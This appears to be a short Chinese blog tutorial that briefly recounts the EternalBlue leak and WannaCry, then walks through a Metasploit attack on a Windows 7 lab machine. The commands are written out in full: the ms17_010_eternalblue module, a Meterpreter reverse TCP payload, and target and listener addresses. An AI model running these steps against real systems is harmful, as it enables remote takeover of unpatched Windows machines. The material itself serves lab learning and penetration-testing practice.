Msf---永恆之藍
阿新 • • 發佈:2020-08-05
簡介
永恆之藍是指2017年4月14日晚,黑客團體Shadow Brokers(影子經紀人)公佈一大批網路攻擊工具,其中包含“永恆之藍”工具,“永恆之藍”利用Windows系統的SMB漏洞可以獲取系統最高許可權。
5月12日,不法分子通>過改造“永恆之藍”製作了wannacry勒索病毒,英國、俄羅斯、整個歐洲以及中國國內多個高校校內網、大型企業內網和政府機構專網中招,被勒索支付高額贖金才能解密恢復檔案。
0.環境
- 虛擬機器(攻) KaliLinux
- 虛擬機器(靶機) Windows7
- 統一區域網下
1.查詢ip
ifconfig
Kali:192.168.43.149
ipconfig
Win7:192.168.43.82
2.開啟metasploit工具
msfconsole
進入metasploit框架
搜尋永恆之藍漏洞
Search ms17-010
4.
使用漏洞
Use exploit/windows/smb/ms17_010_eternalblue
檢視需要設定的引數
Show options
5.配置引數
Set payload windows/x64/meterpreter/reverse_tcp
Set rhost 192.168.43.82
Set lhost 192.168.43.149
6.exploit 策馬奔騰吧!